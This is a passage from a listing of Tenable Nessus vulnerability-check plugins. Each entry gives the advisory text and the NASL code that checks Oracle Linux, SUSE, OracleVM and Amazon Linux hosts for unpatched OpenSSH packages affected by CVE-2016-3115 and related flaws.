reference:"gsi-openssh-7.2p2-2.fc24")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "gsi-openssh"); }

NASL family	Oracle Linux Local Security Checks
NASL id	ORACLELINUX_ELSA-2016-0466.NASL
description	From Red Hat Security Advisory 2016:0466 : Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD
last seen	2020-06-01
modified	2020-06-02
plugin id	90075
published	2016-03-22
reporter	This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/90075
title	Oracle Linux 6 : openssh (ELSA-2016-0466)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2016:0466 and # Oracle Linux Security Advisory ELSA-2016-0466 respectively. # include("compat.inc"); if (description) { script_id(90075); script_version("2.6"); script_cvs_date("Date: 2019/09/27 13:00:37"); script_cve_id("CVE-2015-5600", "CVE-2016-3115"); script_xref(name:"RHSA", value:"2016:0466"); script_name(english:"Oracle Linux 6 : openssh (ELSA-2016-0466)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Oracle Linux host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "From Red Hat Security Advisory 2016:0466 : Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) It was discovered that the OpenSSH sshd daemon did not check the list of keyboard-interactive authentication methods for duplicates. A remote attacker could use this flaw to bypass the MaxAuthTries limit, making it easier to perform password guessing attacks. (CVE-2015-5600) All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically." ); script_set_attribute( attribute:"see_also", value:"https://oss.oracle.com/pipermail/el-errata/2016-March/005877.html" ); script_set_attribute( attribute:"solution", value:"Update the affected openssh packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-askpass"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-ldap"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-server"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:pam_ssh_agent_auth"); script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:6"); script_set_attribute(attribute:"vuln_publication_date", value:"2015/08/02"); script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Oracle Linux Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux"); release = get_kb_item("Host/RedHat/release"); if (isnull(release) \|\| !pregmatch(pattern: "Oracle (?:Linux Server\|Enterprise Linux)", string:release)) audit(AUDIT_OS_NOT, "Oracle Linux"); os_ver = pregmatch(pattern: "Oracle (?:Linux Server\|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux"); os_ver = os_ver[1]; if (! preg(pattern:"^6([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Oracle Linux 6", "Oracle Linux " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu); flag = 0; if (rpm_check(release:"EL6", reference:"openssh-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"EL6", reference:"openssh-askpass-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"EL6", reference:"openssh-clients-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"EL6", reference:"openssh-ldap-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"EL6", reference:"openssh-server-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"EL6", reference:"pam_ssh_agent_auth-0.9.3-114.el6_7")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-askpass / openssh-clients / openssh-ldap / etc"); }

NASL family	SuSE Local Security Checks
NASL id	SUSE_SU-2016-1528-1.NASL
description	openssh was updated to fix three security issues. These security issues were fixed : - CVE-2016-3115: Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH allowed remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions (bsc#970632). - CVE-2016-1908: Possible fallback from untrusted to trusted X11 forwarding (bsc#962313). - CVE-2015-8325: Ignore PAM environment vars when UseLogin=yes (bsc#975865). The update package also includes non-security fixes. See advisory for details. Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	91655
published	2016-06-17
reporter	This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/91655
title	SUSE SLES11 Security Update : openssh (SUSE-SU-2016:1528-1)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from SUSE update advisory SUSE-SU-2016:1528-1. # The text itself is copyright (C) SUSE. # include("compat.inc"); if (description) { script_id(91655); script_version("2.11"); script_cvs_date("Date: 2019/09/11 11:22:13"); script_cve_id("CVE-2015-8325", "CVE-2016-1908", "CVE-2016-3115"); script_name(english:"SUSE SLES11 Security Update : openssh (SUSE-SU-2016:1528-1)"); script_summary(english:"Checks rpm output for the updated packages."); script_set_attribute( attribute:"synopsis", value:"The remote SUSE host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "openssh was updated to fix three security issues. These security issues were fixed : - CVE-2016-3115: Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH allowed remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions (bsc#970632). - CVE-2016-1908: Possible fallback from untrusted to trusted X11 forwarding (bsc#962313). - CVE-2015-8325: Ignore PAM environment vars when UseLogin=yes (bsc#975865). The update package also includes non-security fixes. See advisory for details. Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=729190" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=932483" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=948902" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=960414" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=961368" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=961494" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=962313" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=965576" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=970632" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=975865" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2015-8325/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2016-1908/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2016-3115/" ); # https://www.suse.com/support/update/announcement/2016/suse-su-20161528-1/ script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?81906f53" ); script_set_attribute( attribute:"solution", value: "To install this SUSE Security Update use YaST online_update. Alternatively you can run the command listed for your product : SUSE Linux Enterprise Server 11-SP4 : zypper in -t patch slessp4-openssh-12603=1 SUSE Linux Enterprise Debuginfo 11-SP4 : zypper in -t patch dbgsp4-openssh-12603=1 To bring your system up-to-date, use 'zypper patch'." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-fips"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-helpers"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:11"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"patch_publication_date", value:"2016/06/08"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/06/17"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) \|\| release !~ "^(SLED\|SLES)") audit(AUDIT_OS_NOT, "SUSE"); os_ver = pregmatch(pattern: "^(SLE(S\|D)\d+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "SUSE"); os_ver = os_ver[1]; if (! preg(pattern:"^(SLES11)$", string:os_ver)) audit(AUDIT_OS_NOT, "SUSE SLES11", "SUSE " + os_ver); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if (cpu !~ "^i[3-6]86$" && "x86_64" >!< cpu && "s390x" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu); sp = get_kb_item("Host/SuSE/patchlevel"); if (isnull(sp)) sp = "0"; if (os_ver == "SLES11" && (! preg(pattern:"^(4)$", string:sp))) audit(AUDIT_OS_NOT, "SLES11 SP4", os_ver + " SP" + sp); flag = 0; if (rpm_check(release:"SLES11", sp:"4", reference:"openssh-6.6p1-21.1")) flag++; if (rpm_check(release:"SLES11", sp:"4", reference:"openssh-askpass-gnome-6.6p1-21.3")) flag++; if (rpm_check(release:"SLES11", sp:"4", reference:"openssh-fips-6.6p1-21.1")) flag++; if (rpm_check(release:"SLES11", sp:"4", reference:"openssh-helpers-6.6p1-21.1")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh"); }

NASL family	OracleVM Local Security Checks
NASL id	ORACLEVM_OVMSA-2016-0048.NASL
description	The remote OracleVM system is missing necessary patches to address critical security updates : - CVE-2016-3115: missing sanitisation of input for X11 forwarding (#1317817) - Restore functionallity of pam_ssh_agent_auth in FIPS mode (#1278315) - Initialize devices_done variable for challenge response (#1281468) - Update behaviour of X11 forwarding to match upstream (#1299048) - Ammends previous release, fixing typos and behaviour changes
last seen	2020-06-01
modified	2020-06-02
plugin id	91153
published	2016-05-16
reporter	This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/91153
title	OracleVM 3.3 / 3.4 : openssh (OVMSA-2016-0048)
code	# # (C) Tenable Network Security, Inc. # # The package checks in this plugin were extracted from OracleVM # Security Advisory OVMSA-2016-0048. # include("compat.inc"); if (description) { script_id(91153); script_version("2.7"); script_cvs_date("Date: 2019/09/27 13:00:35"); script_cve_id("CVE-2016-3115"); script_name(english:"OracleVM 3.3 / 3.4 : openssh (OVMSA-2016-0048)"); script_summary(english:"Checks the RPM output for the updated packages."); script_set_attribute( attribute:"synopsis", value:"The remote OracleVM host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "The remote OracleVM system is missing necessary patches to address critical security updates : - CVE-2016-3115: missing sanitisation of input for X11 forwarding (#1317817) - Restore functionallity of pam_ssh_agent_auth in FIPS mode (#1278315) - Initialize devices_done variable for challenge response (#1281468) - Update behaviour of X11 forwarding to match upstream (#1299048) - Ammends previous release, fixing typos and behaviour changes" ); script_set_attribute( attribute:"see_also", value:"https://oss.oracle.com/pipermail/oraclevm-errata/2016-May/000462.html" ); script_set_attribute( attribute:"see_also", value:"https://oss.oracle.com/pipermail/oraclevm-errata/2016-May/000461.html" ); script_set_attribute( attribute:"solution", value: "Update the affected openssh / openssh-clients / openssh-server packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:openssh-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:vm:openssh-server"); script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:vm_server:3.3"); script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:vm_server:3.4"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"patch_publication_date", value:"2016/05/13"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/05/16"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"OracleVM Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/OracleVM/release", "Host/OracleVM/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/OracleVM/release"); if (isnull(release) \|\| "OVS" >!< release) audit(AUDIT_OS_NOT, "OracleVM"); if (! preg(pattern:"^OVS" + "(3\.3\|3\.4)" + "(\.[0-9]\|$)", string:release)) audit(AUDIT_OS_NOT, "OracleVM 3.3 / 3.4", "OracleVM " + release); if (!get_kb_item("Host/OracleVM/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "OracleVM", cpu); if ("x86_64" >!< cpu) audit(AUDIT_ARCH_NOT, "x86_64", cpu); flag = 0; if (rpm_check(release:"OVS3.3", reference:"openssh-5.3p1-117.el6")) flag++; if (rpm_check(release:"OVS3.3", reference:"openssh-clients-5.3p1-117.el6")) flag++; if (rpm_check(release:"OVS3.3", reference:"openssh-server-5.3p1-117.el6")) flag++; if (rpm_check(release:"OVS3.4", reference:"openssh-5.3p1-117.el6")) flag++; if (rpm_check(release:"OVS3.4", reference:"openssh-clients-5.3p1-117.el6")) flag++; if (rpm_check(release:"OVS3.4", reference:"openssh-server-5.3p1-117.el6")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-clients / openssh-server"); }

NASL family	Amazon Linux Local Security Checks
NASL id	ALA_ALAS-2016-668.NASL
description	It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions.
last seen	2020-06-01
modified	2020-06-02
plugin id	89965
published	2016-03-17
reporter	This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/89965
title	Amazon Linux AMI : openssh (ALAS-2016-668)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Amazon Linux AMI Security Advisory ALAS-2016-668. # include("compat.inc"); if (description) { script_id(89965); script_version("2.5"); script_cvs_date("Date: 2019/04/11 17:23:06"); script_cve_id("CVE-2016-3115"); script_xref(name:"ALAS", value:"2016-668"); script_name(english:"Amazon Linux AMI : openssh (ALAS-2016-668)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Amazon Linux AMI host is missing a security update." ); script_set_attribute( attribute:"description", value: "It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions." ); script_set_attribute( attribute:"see_also", value:"https://alas.aws.amazon.com/ALAS-2016-668.html" ); script_set_attribute( attribute:"solution", value:"Run 'yum update openssh' to update your system." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh-keycat"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh-ldap"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:openssh-server"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:amazon:linux:pam_ssh_agent_auth"); script_set_attribute(attribute:"cpe", value:"cpe:/o:amazon:linux"); script_set_attribute(attribute:"patch_publication_date", value:"2016/03/16"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/17"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Amazon Linux Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/AmazonLinux/release", "Host/AmazonLinux/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/AmazonLinux/release"); if (isnull(release) \|\| !strlen(release)) audit(AUDIT_OS_NOT, "Amazon Linux"); os_ver = pregmatch(pattern: "^AL(A\|\d)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Amazon Linux"); os_ver = os_ver[1]; if (os_ver != "A") { if (os_ver == 'A') os_ver = 'AMI'; audit(AUDIT_OS_NOT, "Amazon Linux AMI", "Amazon Linux " + os_ver); } if (!get_kb_item("Host/AmazonLinux/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (rpm_check(release:"ALA", reference:"openssh-6.6.1p1-23.60.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"openssh-clients-6.6.1p1-23.60.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"openssh-debuginfo-6.6.1p1-23.60.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"openssh-keycat-6.6.1p1-23.60.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"openssh-ldap-6.6.1p1-23.60.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"openssh-server-6.6.1p1-23.60.amzn1")) flag++; if (rpm_check(release:"ALA", reference:"pam_ssh_agent_auth-0.9.3-9.23.60.amzn1")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-clients / openssh-debuginfo / openssh-keycat / etc"); }

NASL family	Oracle Linux Local Security Checks
NASL id	ORACLELINUX_ELSA-2016-0465.NASL
description	From Red Hat Security Advisory 2016:0465 : Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD
last seen	2020-06-01
modified	2020-06-02
plugin id	90074
published	2016-03-22
reporter	This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/90074
title	Oracle Linux 7 : openssh (ELSA-2016-0465)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2016:0465 and # Oracle Linux Security Advisory ELSA-2016-0465 respectively. # include("compat.inc"); if (description) { script_id(90074); script_version("2.11"); script_cvs_date("Date: 2019/09/27 13:00:37"); script_cve_id("CVE-2016-1908", "CVE-2016-3115"); script_xref(name:"RHSA", value:"2016:0465"); script_name(english:"Oracle Linux 7 : openssh (ELSA-2016-0465)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Oracle Linux host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "From Red Hat Security Advisory 2016:0465 : Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) An access flaw was discovered in OpenSSH; the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2016-1908) All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically." ); script_set_attribute( attribute:"see_also", value:"https://oss.oracle.com/pipermail/el-errata/2016-March/005876.html" ); script_set_attribute( attribute:"solution", value:"Update the affected openssh packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-askpass"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-keycat"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-ldap"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-server"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:openssh-server-sysvinit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:pam_ssh_agent_auth"); script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:7"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Oracle Linux Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux"); release = get_kb_item("Host/RedHat/release"); if (isnull(release) \|\| !pregmatch(pattern: "Oracle (?:Linux Server\|Enterprise Linux)", string:release)) audit(AUDIT_OS_NOT, "Oracle Linux"); os_ver = pregmatch(pattern: "Oracle (?:Linux Server\|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux"); os_ver = os_ver[1]; if (! preg(pattern:"^7([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Oracle Linux 7", "Oracle Linux " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu); if ("x86_64" >!< cpu) audit(AUDIT_ARCH_NOT, "x86_64", cpu); flag = 0; if (rpm_check(release:"EL7", cpu:"x86_64", reference:"openssh-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"EL7", cpu:"x86_64", 